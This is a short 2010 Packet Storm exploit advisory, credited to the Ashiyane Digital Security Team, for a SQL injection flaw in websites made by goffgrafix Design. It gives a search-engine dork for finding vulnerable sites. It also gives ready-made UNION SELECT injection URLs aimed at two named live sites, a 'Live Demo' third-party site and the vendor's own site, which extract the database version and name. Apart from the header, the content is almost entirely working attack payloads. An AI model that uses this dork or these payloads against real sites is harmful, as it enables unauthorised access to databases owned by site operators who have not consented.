Lucene search
Ashiyane Digital Security TeamPACKETSTORM:89862HistoryMay 25, 2010 - 12:00 a.m.
Goffgrafix Design's SQL Injection
2010-05-2500:00:00
Ashiyane Digital Security Team
packetstormsecurity.com
37
`
=========================================================
goffgrafix Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: goffgrafix Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.goffgrafix.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################
[+] Dork: intext:"Web design by goffgrafix.com"
[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]
[+] Live Demo: http://www.marciasmilack.com/media.php?id=-999+UNION+All+SELECT+1,version(),3,4,5,6,7
[+] Vendor Vulnerability: http://www.goffgrafix.com/designer.php?id=-999+UNION+all+SELECT+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
##########################################
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969
`